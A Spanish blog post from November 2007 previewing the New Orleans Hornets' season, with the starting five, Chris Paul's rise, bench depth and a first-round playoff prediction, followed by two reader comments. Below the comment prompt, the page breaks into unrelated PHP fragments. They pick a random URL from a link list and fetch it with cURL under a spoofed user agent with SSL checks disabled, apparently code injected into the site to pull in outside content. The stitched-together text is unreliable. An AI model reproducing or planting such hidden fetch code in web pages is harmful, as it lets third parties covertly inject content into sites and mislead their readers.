New Orleans Hornets: home, sweet home!

19 de November de 2007 por Gallis

Dos años después, las huellas del huracán Katrina todavía se sienten en New Orleans. Sus habitantes tienen pocos motivos para sonreír. Afortunadamente, el baloncesto es uno de ellos. Y es que tras compartir franquicia dos años con Oklahoma City, los Hornets vuelven a la capital del Missisippi para quedarse. Y vuelven con la promesa de algo grande. El equipo dirigido por Byron Scott, después de dos años creciendo y madurando, de la mano de Chris Paul, parece totalmente preparado para regresar a los Playoffs tras 3 años quedándose a las puertas.

 

El principal aval que presentan los Hornets en su candidatura a la postemporada es su magnífico quinteto titular: Chris Paul, Morris Peterson, Pedja Stojakovic, David West y Tyson Chandler conforman una primera unidad de lujo, al nivel de las mejores de la liga. Combinan juventud, talento y fuerza a partes iguales, amén de ser un equipo con un buen equilibrio entre el juego interior y el juego exterior. Su punto débil, sin duda, es la falta de madurez, tal y como demostraron en la recta final de la pasada temporada, un defecto que este año lo será menos, ya que hombres como Paul, West o Chandler van poco a poco adquiriendo, por así decirlo, el punto óptimo de maduración. La llegada de Morris Peterson será muy importante en este sentido. El escolta, que llega con ganas de revancha tras su ostracismo en Toronto, debe ser vital en aquellos partidos o tramos de la temporada en que las cosas se compliquen.

Pero sin duda el futuro de esta franquicia en los próximos años pasa por las manos de Chris Paul. Ya en su primer año demostró estar llamado a hacer cosas grandes. Además de ser nombrado rookie del año, fue rookie del mes en seis ocasiones, algo que hasta entonces sólo habían conseguido David Robinson, Tim Duncan, Lebron James y Carmelo Anthony. Desde entonces, el base de Wake Forest ha demostrado que su adaptación a la liga es total y este año apunta a convertirse en un habitual de los 20 puntos y las 10 asistencias por partido y, lo que es mejor, en un líder capaz de llevar a su equipo a cotas más altas de las inicialmente previstas. Y si alguien está llamado a compartir el liderato del equipo con Paul, éste no es otro que David West. El ala-pívot afronta una temporada que ha de ser la confirmación de todo lo que promete. Eso sí, siempre y cuando le respeten las lesiones que en las 3 últimas temporadas le han hecho perderse más de 80 partidos. Si está sano, será sin duda una amenaza a tener en cuenta.

 Una de las razones de que el futuro de los Hornets sea tan esperanzador es sin duda, la irrupción de Tyson Chandler. Después de 5 años vagando sin pena ni gloria por Chicago, en sus 2 temporadas en New Orleans se ha convertido en uno de los pivots más sólidos de la liga. Tiene clara su función, ser intenso en defensa y asegurar el rebote, y la desempeña a la perfección. Además, aprovecha los momentos en los que las defensas rivales se centran en West. Otro que tiene clara su misión en el equipo es Stojakovic; el serbio, lejos del nivel que mostró en Sacramento, continúa siendo una amenaza exterior de primer calibre, lo cual supone un arma excepcional para los Hornets. Las lesiones sólo le dejaron jugar 13 partidos el año pasado. Si le respetan, el salto de calidad del equipo será importante.

Cuando Byron Scott gira su cabeza hacia el banquillo en busca de soluciones es cuando nos damos cuenta de que el camino que le queda a este equipo para ser un aspirante al anillo todavía es largo. Pargo, Rasual Butler y Ryan Bowen se repartirán muchos de los minutos destinados a la segunda unidad. Además, Bobby Jackson seguirá aportando su experiencia y su saber hacer dentro y, sobre todo, fuera del campo. Por dentro no sé encontrará con muchas soluciones, ya que ni Melvin Ely ni Hilton Amrstrong parecen recambios fiables para Chandler. Además, hay muchas esperanzas puestas en el rookie Julian Wright, quien quizá disponga de minutos si Stojakovic sigue su particular lucha con las lesiones.

Se acabó el tiempo de adaptación para los Hornets y los Playoffs comienzan a verse en New Orleans como una obligación. Algo que Byron Scott sabe… y con lo que disfruta. El ex jugador de los Lakers del Showtime y ex entrenador de los Nets finalistas en el 2000 es un tipo acostumbrado a trabajar bajo presión y su experiencia será vital para el crecimiento de sus jóvenes jugadores. Quizá pensar en cotas más altas sea algo prematuro, contando con equipos como San Antonio, Dallas, Phoenix, Houston o Utah, pero quedarse fuera de los Playoffs sería sinónimo de una mala temporada del equipo en su regreso al hogar.

Quinteto inicial: Paul, Peterson, Stojakovic, West y Chandler.

Sexto hombre: R. Butler

Predicción: Primera ronda de Playoffs.

Comenta

2 comentarios a esta entrada

  1. txusma dice:
    #1

    Grave lesión de Melvin Ely?

      Citar

  2. Gallis dice:
    #2

    Gracias a Txus y a mi socio por sacarme de mi error 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>